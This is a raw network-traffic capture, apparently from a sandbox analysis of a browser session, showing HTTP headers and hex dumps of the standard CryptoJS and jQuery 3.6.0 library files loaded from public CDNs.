                                                                                                    2024-12-23 18:11:41 UTC962INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:41 GMT
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                    ETag: W/"61182885-40eb"
                                                                                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Timing-Allow-Origin: *
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    CF-Cache-Status: HIT
                                                                                                    Age: 433356
                                                                                                    Expires: Sat, 13 Dec 2025 18:11:41 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WD5zGh3K5nH3Y4pCrABztX6nmwiv%2Bj1XDY9%2BRvreFcfjIxo4UB6EP04Lld%2BaN1mGUOrLN9Pa02S7pFLJwKKTvb0h7yE1MbfBvtVk%2FH7q%2F9OUWXTUNNzhnB8jGMY80APG9O6xbEF"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a50c77e76436c-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:41 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                    Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e
                                                                                                    Data Ascii: peof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79
                                                                                                    Data Ascii: ne.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBy
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b
                                                                                                    Data Ascii: =typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d
                                                                                                    Data Ascii: or(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c
                                                                                                    Data Ascii: :0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66
                                                                                                    Data Ascii: ffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringif
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d
                                                                                                    Data Ascii: r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLM
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d
                                                                                                    Data Ascii: bs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=
                                                                                                    2024-12-23 18:11:41 UTC1369INData Raw: 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31
                                                                                                    Data Ascii: 39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,1


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.549716151.101.66.1374434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:41 UTC621OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                    Host: code.jquery.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: script
                                                                                                    Referer: https://n6b.kolivane.ru/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:41 UTC614INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 89501
                                                                                                    Server: nginx
                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Mon, 23 Dec 2024 18:11:41 GMT
                                                                                                    Age: 462027
                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740045-EWR
                                                                                                    X-Cache: HIT, HIT
                                                                                                    X-Cache-Hits: 2774, 511
                                                                                                    X-Timer: S1734977501.356163,VS0,VE0
                                                                                                    Vary: Accept-Encoding
                                                                                                    2024-12-23 18:11:41 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                    2024-12-23 18:11:41 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                    2024-12-23 18:11:41 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                    2024-12-23 18:11:41 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                    2024-12-23 18:11:41 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                    2024-12-23 18:11:41 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
